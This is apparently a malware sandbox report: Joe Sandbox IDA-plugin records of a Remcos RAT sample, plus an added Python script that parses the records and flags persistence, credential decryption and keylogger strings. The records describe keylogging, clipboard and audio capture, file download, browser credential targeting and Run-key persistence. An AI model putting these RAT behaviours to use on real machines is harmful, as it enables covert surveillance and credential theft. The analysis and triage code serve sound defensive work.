                                                              • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014B9
                                                              • GetProcAddress.KERNEL32(00000000), ref: 004014C0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: GetLastInputInfo$User32.dll
                                                              • API String ID: 2574300362-1519888992
                                                              • Opcode ID: 97ca63f656fbe05ba3a699769711b358361c41ed64750357eec187df6322536e
                                                              • Instruction ID: d02e03e3b89f99dad65f23c179d95e13f318a7fd709defe56253aab8848571e2
                                                              • Opcode Fuzzy Hash: 97ca63f656fbe05ba3a699769711b358361c41ed64750357eec187df6322536e
                                                              • Instruction Fuzzy Hash: EFB092B8580300FBCB102FA0AD4E91E3A68AA18703B1008A7F441C21A1EBB888009F5F
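The IDA-plugin records above are machine-generated, and the behaviours that matter for triage (the autostart key under `Policies\Explorer\Run` on HKLM, the run-time resolution of `crypt32!CryptUnprotectData` and `User32!GetLastInputInfo`, `ShellExecuteW` of `cmd.exe`, the keylogger status strings) are scattered across them. The following Python is an added example, not part of the Joe Sandbox report or of the Remcos sample: it parses lines of the `• Name.MODULE(args), ref: ADDR` form exactly as printed on this page and applies a handful of triage rules to them. The sample input is constructed from the records above. Two assumptions are made: arguments never contain a literal comma (true for every record here), and the second string shown for `LoadLibraryA`/`GetModuleHandleA` is the plugin's rendering of the adjacent `GetProcAddress` target; the `8000000x` root-key constants are the documented `HKEY_*` values.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample: API-call lines copied from the plugin records above.
# Hash, memory-dump and empty label lines are deliberately absent; the parser
# ignores anything that is not a call line anyway.
SAMPLE = r"""
• CreateThread.KERNEL32(00000000,00000000,0040A2B8,004750F0,00000000,00000000), ref: 0040A239
  • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B1AD
  • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
• LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData), ref: 00406ABD
• GetProcAddress.KERNEL32(00000000), ref: 00406AC4
• RegCreateKeyW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?), ref: 0041385A
• RegSetValueExW.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,?,?,?,?,00000000,004752D8,759237E0,?), ref: 00413888
• RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,0046612C), ref: 004137B9
• ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041616B
• LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014B9
"""

# One call line: optional "Part of subcall function XXXXXXXX:" prefix, then
# Api.MODULE, optional "(args)", then "ref: ADDR". Calls without an argument
# list (wsprintfW.USER32 ref: ...) are accepted too.
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<parent>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[\w@:]+)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# Predefined registry root handles as passed in the first RegCreateKey argument.
HKEY_NAMES = {
    "80000000": "HKEY_CLASSES_ROOT",
    "80000001": "HKEY_CURRENT_USER",
    "80000002": "HKEY_LOCAL_MACHINE",
    "80000003": "HKEY_USERS",
}

# Functions whose run-time resolution is worth calling out on its own.
RESOLVED_API_TAGS = {
    "CryptUnprotectData": "DPAPI decryption, used for stored browser/mail credentials",
    "GetLastInputInfo": "user-idle time query",
    "GetCursorInfo": "cursor / user-activity query",
}


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: str                 # address of the call site
    parent: Optional[str]    # function address when listed as a subcall


def parse_calls(text: str) -> List[ApiCall]:
    """Turn plugin call lines into ApiCall records; non-matching lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = CALL_RE.match(line)
        if not m:
            continue
        raw = m.group("args") or ""
        # Assumption: no argument contains a comma, so a plain split is enough.
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("api"), m.group("module"), args,
                             m.group("ref").upper(), m.group("parent")))
    return calls


def registry_root(handle: str) -> str:
    """Map a hex HKEY constant to its name; unknown values are returned as-is."""
    return HKEY_NAMES.get(handle.upper(), handle)


def triage(calls: List[ApiCall]) -> List[str]:
    """Apply a few behaviour rules and return one finding string per hit."""
    findings = []
    for c in calls:
        a = c.args
        if c.api.startswith(("RegCreateKey", "RegOpenKey")) and len(a) >= 2:
            root, path = registry_root(a[0]), a[1].rstrip("\\")
            low = path.lower()
            if low.endswith(r"currentversion\run") or low.endswith(r"policies\explorer\run"):
                findings.append(f"{c.ref}: autostart persistence via {root}\\{path}")
            elif low == r"control panel\desktop":
                findings.append(f"{c.ref}: wallpaper/desktop settings write under {root}\\{path}")
        elif c.api in ("LoadLibraryA", "LoadLibraryW", "GetModuleHandleA", "GetModuleHandleW") and len(a) >= 2:
            # Assumption: a[1] is the name pushed for the following GetProcAddress.
            lib, func = a[0], a[1]
            tag = RESOLVED_API_TAGS.get(func, "dynamic import")
            findings.append(f"{c.ref}: resolves {lib}!{func} at run time ({tag})")
        elif c.api.startswith("ShellExecute") and len(a) >= 3 and a[2].lower() == "cmd.exe":
            findings.append(f"{c.ref}: launches {a[2]} via {c.api} (command execution)")
        # String arguments are checked for every call, including subcalls.
        for arg in a:
            if "keylogger started" in arg.lower():
                findings.append(f"{c.ref}: keylogger status string '{arg}'")
    return findings


if __name__ == "__main__":
    for finding in triage(parse_calls(SAMPLE)):
        print(finding)
```

Run against the constructed sample this yields six findings in call order: the keylogger string at `0040B1AD`, the `crypt32!CryptUnprotectData` resolution at `00406ABD`, HKLM `Policies\Explorer\Run` persistence at `0041385A`, the `Control Panel\Desktop` write at `004137B9`, `cmd.exe` via `ShellExecuteW` at `0041616B`, and `User32.dll!GetLastInputInfo` at `004014B9`. Feeding it the full record list from a report gives a compact behaviour summary keyed by call-site address, which is what you want when cross-referencing against the Yara and Sigma hits listed in the Signatures section.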
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free
                                                              • String ID:
                                                              • API String ID: 269201875-0
                                                              • Opcode ID: 5a84445a6d60efe319971740dde2d2f541f568e0726df331b0a843d8179482b0
                                                              • Instruction ID: 6f8591e81a910498abf0b0e408487d1c0faf04506bf4bd3dd9e850377c22d226
                                                              • Opcode Fuzzy Hash: 5a84445a6d60efe319971740dde2d2f541f568e0726df331b0a843d8179482b0
                                                              • Instruction Fuzzy Hash: 34413931B00104AAEB207B7A9C4666F3AB5DF45735F570A1FFD28C7293DA7C481D426A
                                                              APIs
                                                              Strings
                                                              • Cleared browsers logins and cookies., xrefs: 0040C130
                                                              • [Cleared browsers logins and cookies.], xrefs: 0040C11F
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Sleep
                                                              • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                              • API String ID: 3472027048-1236744412
                                                              • Opcode ID: 857d3cd121560083d8ce3f08402db4584d0000cc5e9f96a8e1a49aed9ab164ab
                                                              • Instruction ID: 5a72b8a34604a64e244bad04561a930bad76f77e78bf22f3e088d6afb7384554
                                                              • Opcode Fuzzy Hash: 857d3cd121560083d8ce3f08402db4584d0000cc5e9f96a8e1a49aed9ab164ab
                                                              • Instruction Fuzzy Hash: A431A805648381EDD6116BF514967AB7B824A53748F0882BFB8C4373C3DA7A4808C79F
                                                              APIs
                                                                • Part of subcall function 0041C5E2: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041C5F2
                                                                • Part of subcall function 0041C5E2: GetWindowTextLengthW.USER32(00000000), ref: 0041C5FB
                                                                • Part of subcall function 0041C5E2: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041C625
                                                              • Sleep.KERNEL32(000001F4), ref: 0040A5AE
                                                              • Sleep.KERNEL32(00000064), ref: 0040A638
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Window$SleepText$ForegroundLength
                                                              • String ID: [ $ ]
                                                              • API String ID: 3309952895-93608704
                                                              • Opcode ID: 0877f6620f6187a1062b87b3f34e88cc83cbee9ae63c8039862e0d8bb1bff125
                                                              • Instruction ID: 6255842b65d5da3793f092b3f1447ea5db7efb23f61c0c2d19f8aa6a86066f85
                                                              • Opcode Fuzzy Hash: 0877f6620f6187a1062b87b3f34e88cc83cbee9ae63c8039862e0d8bb1bff125
                                                              • Instruction Fuzzy Hash: CB119F315143006BC614BB26CC579AF77A8AB90348F40083FF552661E3EF79AE18869B
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fcebbc467d131149bede3708c03e30a5933a8f2bf6fa192c1d79c37d30f8ae05
                                                              • Instruction ID: 2af8e1c260e5220142bf0b5f8a7e988c949d9a3a1697e0ff4d6bcf25ce69da1b
                                                              • Opcode Fuzzy Hash: fcebbc467d131149bede3708c03e30a5933a8f2bf6fa192c1d79c37d30f8ae05
                                                              • Instruction Fuzzy Hash: 7E01F2B26093557EFA202E786CC2F67630DCB51FBAB31033BB520612D2DB68DD40452C
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d36049e99d51c5662ea1cdccde7f001ca18baa555cb14a41c95be32ad22d597f
                                                              • Instruction ID: 437de9af4247593539f95cdbb70b1dc5411192884b5f12beac7b10196549b189
                                                              • Opcode Fuzzy Hash: d36049e99d51c5662ea1cdccde7f001ca18baa555cb14a41c95be32ad22d597f
                                                              • Instruction Fuzzy Hash: CB01ADB26096527ABA202E796CC5E27634CDB42BBA335037BF821512E3DF68DE054169
                                                              APIs
                                                              • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C52F
                                                              • GetFileSize.KERNEL32(00000000,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C543
                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C568
                                                              • CloseHandle.KERNEL32(00000000,?,00000000,0040412F,00465E84), ref: 0041C576
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: File$CloseCreateHandleReadSize
                                                              • String ID:
                                                              • API String ID: 3919263394-0
                                                              • Opcode ID: 253de0e05f1e183a51722a251bf095503662c065c08e6289a01aaeef394dcb57
                                                              • Instruction ID: 4673af35f3eeaf13de89ae80f5e83caf65f56e40ae5cb47f4621101913e6d1ef
                                                              • Opcode Fuzzy Hash: 253de0e05f1e183a51722a251bf095503662c065c08e6289a01aaeef394dcb57
                                                              • Instruction Fuzzy Hash: 50F0C2B1241318BFE6101B25ADC9EBB369DDB866A9F10063EF802A22D1DA698D055139
                                                              APIs
                                                              • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                              • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C2C4
                                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C2CC
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseHandleOpenProcess
                                                              • String ID:
                                                              • API String ID: 39102293-0
                                                              • Opcode ID: 81942e7addce2a1bdc39bfb83f2669cd8d6753e4bd6c5855ff2ce9cbe7850470
                                                              • Instruction ID: 82f86893bb8475317186349f6084970b7a3011258d8579340058f5d8518f4318
                                                              • Opcode Fuzzy Hash: 81942e7addce2a1bdc39bfb83f2669cd8d6753e4bd6c5855ff2ce9cbe7850470
                                                              • Instruction Fuzzy Hash: 9C01F231680215ABD61066949C8AFA7B66C8B84756F0001ABFA08D22A2EF74CD81466A
                                                              APIs
                                                              • ___BuildCatchObject.LIBVCRUNTIME ref: 004398FA
                                                                • Part of subcall function 00439F32: ___AdjustPointer.LIBCMT ref: 00439F7C
                                                              • _UnwindNestedFrames.LIBCMT ref: 00439911
                                                              • ___FrameUnwindToState.LIBVCRUNTIME ref: 00439923
                                                              • CallCatchBlock.LIBVCRUNTIME ref: 00439947
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                              • String ID:
                                                              • API String ID: 2633735394-0
                                                              • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                              • Instruction ID: 1eef882e9718bbd9a0ab38cd68ce054dbb3f9d4064fa539f417e17899f1f7293
                                                              • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                              • Instruction Fuzzy Hash: 38010532000109BBCF125F56CC01EDA3BAAEF5C754F05901AF95865221C3BAE862ABA4
                                                              APIs
                                                              • GetSystemMetrics.USER32(0000004C), ref: 0041942B
                                                              • GetSystemMetrics.USER32(0000004D), ref: 00419431
                                                              • GetSystemMetrics.USER32(0000004E), ref: 00419437
                                                              • GetSystemMetrics.USER32(0000004F), ref: 0041943D
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MetricsSystem
                                                              • String ID:
                                                              • API String ID: 4116985748-0
                                                              • Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                              • Instruction ID: fd4820a3fb0c8fcfb80096478546269f04700e3de9cdf271d69d174aa35805c7
                                                              • Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                              • Instruction Fuzzy Hash: 3FF0A4B1B043155BD700EE758C51A6B6ADAEBD4364F10043FF60887281EFB8DC468B84
                                                              APIs
                                                              • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438FB1
                                                              • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438FB6
                                                              • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438FBB
                                                                • Part of subcall function 0043A4BA: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A4CB
                                                              • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438FD0
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                              • String ID:
                                                              • API String ID: 1761009282-0
                                                              • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                              • Instruction ID: 3a6c9073cd349407f79861cc5a63413a30b4b1af88e8d748f4708d1390bfb410
                                                              • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                              • Instruction Fuzzy Hash: 8DC04C44080381552C50B6B2110B2AF83521C7E38CF9074DFBDD1579474D5D052F553F
                                                              APIs
                                                              • __startOneArgErrorHandling.LIBCMT ref: 00442D3D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorHandling__start
                                                              • String ID: pow
                                                              • API String ID: 3213639722-2276729525
                                                              • Opcode ID: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                                                              • Instruction ID: 2abd0c7c8e13d4a8cd2c8141c546921d868ac315c0d238e81b652aa6ec7fde8b
                                                              • Opcode Fuzzy Hash: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                                                              • Instruction Fuzzy Hash: 92515AE1E0460296FB167714CE4137B6794AB50741F70497BF0D6823EAEA7C8C859B4F
                                                              APIs
                                                              • WideCharToMultiByte.KERNEL32(000000FF,00000000,00000006,00000001,?,?,00000000,?,00000000,?,?,00000000,00000006,?,?,?), ref: 00449F8F
                                                              • GetLastError.KERNEL32 ref: 00449FAB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ByteCharErrorLastMultiWide
                                                              • String ID: PkGNG
                                                              • API String ID: 203985260-263838557
                                                              • Opcode ID: d1185fb95bfff78fff583c453b007e19375680cfc0f7d37f8e74ebb942ffdfee
                                                              • Instruction ID: e4919e29a80df6b7ced925805d10dfcffaa1b378e184719e11b938f1b8f94c7b
                                                              • Opcode Fuzzy Hash: d1185fb95bfff78fff583c453b007e19375680cfc0f7d37f8e74ebb942ffdfee
                                                              • Instruction Fuzzy Hash: 2331E430200201ABFB21EF56C845BAB7768EF45721F15016BF815C7391DB38CD45E7A9
                                                              APIs
                                                                • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                              • __Init_thread_footer.LIBCMT ref: 0040B7D2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Init_thread_footer__onexit
                                                              • String ID: [End of clipboard]$[Text copied to clipboard]
                                                              • API String ID: 1881088180-3686566968
                                                              • Opcode ID: 7be63757e29b9f91be4cc1fce50211db745ac7e2ddcf3fa0e25e131e1c8bf245
                                                              • Instruction ID: 844f446031992ee5170c212df839aebd4a436c67f2956c9e8fe8aff684c3a130
                                                              • Opcode Fuzzy Hash: 7be63757e29b9f91be4cc1fce50211db745ac7e2ddcf3fa0e25e131e1c8bf245
                                                              • Instruction Fuzzy Hash: 30217131A102198ACB14FBA6D8929EDB375AF54318F10443FE505771D2EF786D4ACA8C
                                                              APIs
                                                              • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451E12,?,00000050,?,?,?,?,?), ref: 00451C92
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ACP$OCP
                                                              • API String ID: 0-711371036
                                                              • Opcode ID: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                                              • Instruction ID: 09b953eaa346ea86c897215e5a2a15a508f8bcb16f9b984b1dadcb699cf7d301
                                                              • Opcode Fuzzy Hash: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                                              • Instruction Fuzzy Hash: E821D862A80204A6DB36CF14C941BAB7266DB54B13F568426ED0AD7322F73BED45C35C
                                                              APIs
                                                              • WriteFile.KERNEL32(?,?,?,?,00000000,FF8BC35D,00000000,?,PkGNG,0044BBEE,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B85B
                                                              • GetLastError.KERNEL32 ref: 0044B884
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorFileLastWrite
                                                              • String ID: PkGNG
                                                              • API String ID: 442123175-263838557
                                                              • Opcode ID: 9f33f136d580808b36a549075194831cac44b680ed95d57240af363647088f83
                                                              • Instruction ID: 9972a58bdd01e134d13becd973f3089a2f7b3635eb9ddb95e5d59f4384582b5e
                                                              • Opcode Fuzzy Hash: 9f33f136d580808b36a549075194831cac44b680ed95d57240af363647088f83
                                                              • Instruction Fuzzy Hash: B2316F31A00619DBCB24DF59DD8099AF3F9FF48301B1485AAE909D7261E734ED81CBA8
                                                              APIs
                                                              • WriteFile.KERNEL32(?,?,?,?,00000000,FF8BC35D,00000000,?,PkGNG,0044BC0E,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B76D
                                                              • GetLastError.KERNEL32 ref: 0044B796
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorFileLastWrite
                                                              • String ID: PkGNG
                                                              • API String ID: 442123175-263838557
                                                              • Opcode ID: 482fa6ac77512a0fc819500aa413458c203250297fd7de672378db3e029a087c
                                                              • Instruction ID: c865f2f287ade0309940dd9d446f9ab1351fd896516eb6f8948e0fb5ca6ebdce
                                                              • Opcode Fuzzy Hash: 482fa6ac77512a0fc819500aa413458c203250297fd7de672378db3e029a087c
                                                              • Instruction Fuzzy Hash: 69219435600219DFDB14CF69D980BEAB3F9EB48312F1048AAE94AD7251D734ED85CB64
                                                              APIs
                                                              • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405030
                                                                • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                              • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405087
                                                              Strings
                                                              • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: LocalTime
                                                              • String ID: KeepAlive | Enabled | Timeout:
                                                              • API String ID: 481472006-1507639952
APIs
• Sleep.KERNEL32 ref: 0041667B
• URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166DD
Strings
• API ID: DownloadFileSleep
• String ID: !D@
• API String ID: 1931167962-604454484
APIs
• PathFileExistsW.SHLWAPI(00000000), ref: 0041ADCD
Strings
• API ID: ExistsFilePath
• String ID: alarm.wav$hYG
• API String ID: 1174141254-2782910960
APIs
  • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B1AD
  • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
• CloseHandle.KERNEL32(?), ref: 0040B0EF
• UnhookWindowsHookEx.USER32 ref: 0040B102
Strings
• API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
• String ID: Online Keylogger Stopped
• API String ID: 1623830855-1496645233
APIs
• LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,A4E85006,00000001,?,0043CEA5), ref: 00448CA4
Strings
• API ID: String
• String ID: LCMapStringEx$PkGNG
• API String ID: 2568140703-1065776982
APIs
• waveInPrepareHeader.WINMM(?,00000020,?,?,00476B50,00474EE0,?,00000000,00401A15), ref: 00401849
• waveInAddBuffer.WINMM(?,00000020,?,00000000,00401A15), ref: 0040185F
Strings
• API ID: wave$BufferHeaderPrepare
• String ID: XMG
• API String ID: 2315374483-813777761
APIs
• IsValidLocale.KERNEL32(00000000,kKD,00000000,00000001,?,?,00444B6B,?,?,?,?,00000004), ref: 00448BB2
Strings
• API ID: LocaleValid
• String ID: IsValidLocaleName$kKD
• API String ID: 1901932003-3269126172
APIs
• PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C531
Strings
• API ID: ExistsFilePath
• String ID: UserProfile$\AppData\Local\Google\Chrome\
• API String ID: 1174141254-4188645398
APIs
• PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C594
Strings
• API ID: ExistsFilePath
• String ID: UserProfile$\AppData\Local\Microsoft\Edge\
• API String ID: 1174141254-2800177040
APIs
• PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000), ref: 0040C5F7
Strings
• API ID: ExistsFilePath
• String ID: AppData$\Opera Software\Opera Stable\
• API String ID: 1174141254-1629609700
APIs
• GetKeyState.USER32(00000011), ref: 0040B686
  • Part of subcall function 0040A41B: GetForegroundWindow.USER32 ref: 0040A451
  • Part of subcall function 0040A41B: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A45D
  • Part of subcall function 0040A41B: GetKeyboardLayout.USER32(00000000), ref: 0040A464
  • Part of subcall function 0040A41B: GetKeyState.USER32(00000010), ref: 0040A46E
  • Part of subcall function 0040A41B: GetKeyboardState.USER32(?), ref: 0040A479
  • Part of subcall function 0040A41B: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A49C
  • Part of subcall function 0040A41B: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4FC
  • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,00000000,0040B245,00000000), ref: 0040A69D
Strings
• API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
• String ID: [AltL]$[AltR]
• API String ID: 2738857842-2658077756
APIs
• GetSystemTimeAsFileTime.KERNEL32(00000000,0043AB37), ref: 00448A16
Strings
• API ID: Time$FileSystem
• String ID: GetSystemTimePreciseAsFileTime$PkGNG
• API String ID: 2086374402-949981407
APIs
• ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161E3
Strings
• API ID: ExecuteShell
• String ID: !D@$open
• API String ID: 587946157-1586967515
APIs
• ___initconout.LIBCMT ref: 004555DB
